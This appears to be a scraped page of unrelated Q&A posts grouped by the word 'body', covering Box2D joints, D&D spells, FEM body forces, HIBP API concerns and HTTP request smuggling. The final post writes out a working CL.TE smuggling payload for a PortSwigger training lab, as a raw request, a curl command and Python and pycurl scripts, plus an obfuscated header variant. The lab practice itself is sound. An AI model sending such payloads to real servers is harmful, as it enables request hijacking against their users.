Unable to rotate box2d body with torque if revolute joint introduced

I created a simple body (PLAYER) which, as speed increased the angle of the body increases slightly. I set the torque property based on velocity, to change the body’s angle, and it looks like the player is leaning forward as he runs. Great.

I wanted to prevent my PLAYER from flipping over (when hitting other bodies), so I created a second body and placed a revolute joint between them. The second body has rotation disabled, and is dynamic. I discovered that I did not need to apply any angle limits to prevent flipping, since the joint seemed to resist rotation. The player actually rights himself if flipped on his side. (The joint seems to want to return to 0 angle). The motor is disabled, no motor speed, no motor torque. Still, the joint returns to 0′.

The PLAYER still rotates a bit when hitting other bodies, but I can no longer rotate the body with any torque value (to make him lean forward). Why? I need to restore the leaning effect.

I don’t understand why the second body + revolute joint prevent rotation due to any torque applied. Can someone explain, and offer solution?

Magic for a cleric to hide a living body

I’m looking for a way that a cleric in 5E D&D can hide a living body, i.e., with a magic spell. Considering up to 5th-level spells, PHB rules only.

The use-case could be, for example: When an ally is fallen and we’d like to make sure that monsters don’t hit-to-kill the fallen party member, or drag them off mid-combat to hold as captives or finish them off.

I’ve scoured the cleric PHB listings and basically come up empty. What can we do in this case to render a living body unseen?

Stone Shape, body surface area, and imprisonment [closed]

While examining various uses for stone shape and trying to double check the math on them all (such as cages, jamming doors, making poles, etc) it occurred to me that a use potentially far better than ‘encasing them in a box of rock’ would be instead to do a skin tight encasing of the individual (making it, practically speaking, impossible to move). Granted, for high (18-20) strength characters and creatures I suspect it’d be a full round action to simply break out of it, but I’m curious how the math exactly checks out, and what the exact numbers are. Surface area of a person (or a ‘medium’ creature) would need to be determined, and for small or large creatures there’d be other determinations one would have to make.

Still, it seems to me that it would be using significantly less stone than encasing someone in a box or cage.

It wouldn’t be my go to use, but I can imagine that against say some sort of goblin spell caster, or an evil elf wizard it could have some practical use.

Does contingency work if you are polymorphed and so the statuette merged with your body?

The spell Contingency has a material component of:

a statuette of yourself carved from ivory and decorated with gems worth at least 1,500 gp

The spell also ends if this statue isn’t on your person.

Also, contingency ends on you if its material component is ever not on your person.

If you are polymorphed into another form, the spell Polymorph states:

The target’s gear melds into the new form. The creature can’t activate, use, wield, or otherwise benefit from any of its equipment.

Is having the contingency spell not end a "benefit" of your equipment? Or, since it’s melded into your form, is it still on your person? Would the contingency still trigger after reverting to your humanoid form?

Specify a force on the entire body (e.g. gravity)

In the thread Stress calculations using finite elements User21 showed an example how to define a force over the entire body during FEM calculation as boundary condition. See the screenshot below from the corresponding position in this thread.

enter image description here

In the description of the definition of the boundary condition – force on the entire bodyUser21 has defined the differential equation system as follows.

$ ps$ == {$ 0, -9.8$ }

Which unit has this power? Is the unit $ N/m^2$ ?

If $ N/m^2$ is the correct unit, then I can understand how to calculate the normalized body force from the density and volume of the body and insert it into the right side of the differential equation.

If $ N/m^2$ is not the right unit, then I have the following questions on you:

How is the density of the material or the mass considered here? Could you please show how to use this correctly in the equation?

In my case I have a centripetal acceleration due to rotation and the equation would look like this:

$ ps$ == {$ omega ^2 * x, omega ^2 * y$ }

Omega is the angular velocity of the body for which the deformations are to be calculated with FEM. And the expression

$ omega^2 * r$

is the centripetal acceleration, where $ r$ is the distance from the center of rotation.

However also here I have the problem, density resp. masses are not considered.

Does anybody have an answer to the question how to use the density and the mass correctly in the equation?

Many thanks in advance!

Is this (explained in body) a possible attack vector when using haveibeenpwned API?

I’m currently working on understanding and contemplating to implement password strength validation for sign ups in my app, to include checking haveibeenpwned if entered password is compromised elsewhere.

I understand the process involves the site sending a partial hash of the password to HIBP and HIBP will respond whether it’s pwned.

I am also assuming that it is possible that HIBP stores logs of my API request and that it may contain information leading back to my app.

If HIBP gets hacked, and attacker gains access to the above hypothetical logs, assuming that it contains all the information in the original request – the partial hash and where it came from (my site), can the attacker construct an attack on my site is this way?

  1. Hash the passwords in the list of pwned password and get a list of hashes
  2. Match the partial hash he has with those in the above list and derive a refined dictionary of N number of possible passwords with same partial hash
  3. Try the passwords on my site

I am aware at every point in the above, measures can be put in place to mitigate each, e.g. 2FA. But it is not my objective to ask for how to secure my sign up, but to validate my concerns with using HIBP and whether there’s an attack vector to be considered.

PS: I’m not a security expert but I do know how passwords and hashes work. As HIBP is new to me, I don’t fully know how it works and all the features of its API. Pardon me if I made wrong assumptions.

Python Script POST Body Containing CRLF Characters and Malformed Headers. HTTP Request Smuggling

Lately I have been attempting Portswiggers WebSecAcademy’s HTTP request smuggling labs with the additional challenge of writing a python script to complete the challenge for me.

Intended solution from Burp Repeater:

POST / HTTP/1.1 Host: ac971f2f1fe48ec180f863d5009000ed.web-security-academy.net User-Agent: Mozilla/5.0 (X11; Linux i686; rv:68.0) Gecko/20100101 Firefox/68.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: https://portswigger.net/web-security/request-smuggling/lab-basic-cl-te Connection: close Upgrade-Insecure-Requests: 1 Content-Length: 10 Transfer-Encoding: chunked  0  G  

If you right click and select ‘Copy as curl command’:

curl -i -s -k -X $  'POST' \     -H $  'Host: ac011f9b1f7e242780ce2272008a009d.web-security-academy.net' -H $  'User-Agent: Mozilla/5.0 (X11; Linux i686; rv:68.0) Gecko/20100101 Firefox/68.0' -H $  'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8' -H $  'Accept-Language: en-US,en;q=0.5' -H $  'Accept-Encoding: gzip, deflate' -H $  'Referer: https://portswigger.net/web-security/request-smuggling/lab-basic-cl-te' -H $  'Connection: close' -H $  'Upgrade-Insecure-Requests: 1' -H $  'Content-Length: 8' \     --data-binary $  '0\x0d\x0a\x0d\x0aG\x0d\x0a\x0d\x0a' \     $  'https://ac011f9b1f7e242780ce2272008a009d.web-security-academy.net/' 

When attempting this with Curl, it returns 500 internal server error.

I have managed to complete this using the Python requests module:

def POST_CLTE():     url = 'https://ac011f9b1f7e242780ce2272008a009d.web-security-academy.net/'     headers = {'Host':'ac011f9b1f7e242780ce2272008a009d.web-security-academy.net','Connection':'keep-alive',     'Content-Type':'application/x-www-form-urlencoded','Content-Length':'8', 'Transfer-Encoding':'chunked'}      data = '0\x0d\x0a\x0d\x0aG\x0d\x0a'      s = requests.Session()     r = requests.Request('POST', url, headers=headers, data=data)     prepared = r.prepare()     response = s.send(prepared)      print(response.request.headers)     print(response.status_code)     print(response.text) 

But I don’t like that I have to pass the header in as a dict and it complains when I want to include an obfuscated header such as:

X: X[\n]Transfer-Encoding: chunked 

I’ve attempted to reproduce the request using PyCurl:

#!/usr/bin/python  import pycurl from StringIO import StringIO  buffer = StringIO() c = pycurl.Curl() c.setopt(c.POST, 1) c.setopt(c.URL, 'https://ac011f9b1f7e242780ce2272008a009d.web-security-academy.net/') c.setopt(c.POSTFIELDS, '0\x0d\x0a\x0d\x0aG\x0d\x0a') #c.setopt(pycurl.POSTFIELDSIZE, 8) c.setopt(c.HTTPHEADER, [     'User-Agent: Mozilla/5.0 (X11; Linux i686; rv:68.0) Gecko/20100101 Firefox/68.0',     'Host: ac011f9b1f7e242780ce2272008a009d.web-security-academy.net',     'Content-Length: 8',     'Transfer-Encoding: chunked',     'Content-Type: application/x-www-form-urlencoded'     ]) #c.setopt(c.CRLF, 1) c.setopt(c.VERBOSE, 1) c.setopt(c.HEADER, 1) c.setopt(c.WRITEDATA, buffer) c.perform() c.close()  body = buffer.getvalue()  print(body) 

I like that I can pass the headers as an array of strings, but I unfortunately still get 500 internal server error:

*   Trying 18.200.141.238:443...                                                                                                                             * TCP_NODELAY set                                                                                                                                            * Connected to ac561fd21ed819768081009200f2002e.web-security-academy.net (18.200.141.238) port 443 (#0)                                                      * found 387 certificates in /etc/ssl/certs * ALPN, offering h2 * ALPN, offering http/1.1 * SSL connection using TLS1.2 / ECDHE_RSA_AES_128_GCM_SHA256 *        server certificate verification OK *        server certificate status verification SKIPPED *        common name: web-security-academy.net (matched) *        server certificate expiration date OK *        server certificate activation date OK *        certificate public key: RSA *        certificate version: #3 *        subject: CN=web-security-academy.net *        start date: Fri, 05 Jul 2019 00:00:00 GMT *        expire date: Wed, 05 Aug 2020 12:00:00 GMT *        issuer: C=US,O=Amazon,OU=Server CA 1B,CN=Amazon * ALPN, server did not agree to a protocol > POST / HTTP/1.1 Host: ac561fd21ed819768081009200f2002e.web-security-academy.net Accept: */* User-Agent: Mozilla/5.0 (X11; Linux i686; rv:68.0) Gecko/20100101 Firefox/68.0  Content-Length: 8 Transfer-Encoding: chunked Content-Type: application/x-www-form-urlencoded  8 * upload completely sent off: 15 out of 8 bytes * Mark bundle as not supporting multiuse < HTTP/1.1 500 Internal Server Error < Content-Type: application/json; charset=utf-8 < Connection: close < Content-Length: 23 <  * Closing connection 0 HTTP/1.1 500 Internal Server Error Content-Type: application/json; charset=utf-8 Connection: close Content-Length: 23  "Internal Server Error" 

What is the reason for this behaviour? Are there any alternatives I haven’t explored? Any suggestions are much appreciated.